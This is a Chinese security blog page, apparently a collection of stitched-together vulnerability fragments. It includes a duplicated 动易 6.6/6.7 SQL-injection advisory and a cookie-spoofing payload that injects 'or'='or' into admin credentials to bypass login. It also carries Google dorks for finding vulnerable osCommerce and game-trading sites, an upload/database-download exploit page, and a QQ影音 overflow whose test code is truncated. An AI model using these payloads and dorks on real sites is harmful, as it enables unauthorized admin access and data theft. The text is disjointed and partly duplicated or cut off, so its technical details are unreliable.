动易6.6 6.7注入漏洞
[!]作者 :seraph
[!]QQ :81413170
[!]程序名称 ;动易
[!]包含版本 :6.6,6.7
[!]漏洞文件 :payonline/autorecive1.asp
[!]漏洞描述 :参数未过滤,可产生注入漏洞
[!]危害程度 :低
[!]首发日期 :2010-8-12
************************************************************************
...

[!]作者 :seraph
[!]QQ :81413170
[!]程序名称 ;动易
[!]包含版本 :6.6,6.7
[!]漏洞文件 :payonline/autorecive1.asp
[!]漏洞描述 :参数未过滤,可产生注入漏洞
[!]危害程度 :低
[!]首发日期 :2010-8-12
************************************************************************
...

COOKIES欺骗,下面的是COOKIES利用代码:
Sy%5FShops=TFlags=1%2C2%2C3%2C4%2C5%2C11%2C12%_2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C21%2C22%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C41%2C42%2C43%_2C44%2C51%2C52%2C53%2C54%2C55%2C56%2C61%2C62%2C63%2C64&AdminoldFlags=1&Truename=%CE%_DE&AdminFlags=1&AdminPassword='or'='or'&AdminName='or'='or';


这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。


EZ-Oscommerce 3.1程序针对其上传进行严格验证和过滤,可以上传任意恶意代码。google :Powered by osCommerce 或者Customized by EZ-Oscommerce

QQ影音是腾讯公司推出的一款支持任何格式影片和音乐文件的本地播放器。用户受骗使用QQ影音打开了特制的ASX或CUE文件就可以触发栈溢出,导致执行任意代码。
测试代码:
#!/usr/bin/env python#################################################################...

跨站请求伪造(cross-site request forgery)通常缩写为CSRF/XSRF,直译为跨站请求伪造,即攻击者通过调用第三方网站的恶意脚本或者利用程序来伪造请求,当然并不需要向用户端伪装任何具有欺骗的内容,在用户不知情时攻击者直接利用用户的浏览器向攻击的应用程序提交一个已经预测好请求参数的操作数据包,利用的实质是劫持用户的会话状态,强行提交攻击者构造的具有“操作行为”的数据包。可以看出,最关键的是劫持用户的会话状态,所以说,导致XSRF漏洞的主要原因是会话状态的保持没有唯一时间特征的标识,即是说在使用HTTPCookie传送会话令牌的过程中,应该更谨慎的判断当前用户,而不是简单的通过操作数据包的 Cookie值来鉴别,简单的说是每次数据交互时,对提交的数据包实行唯一性标识。与XSS攻击相比,XSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
...

华速网游交易平台oday程序:华速网游交易平台
漏洞说明:上传,暴库
google关键字: inurl:list_buy.asp?class_1
EXP测试:
(复制代码保存为html文件)
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
...
博主:0x0F
专注于WEB安全,寻志同道合的朋友一起交流技术。QQ:unMD5(50a9780c2be657b465f74e56f1d6e429)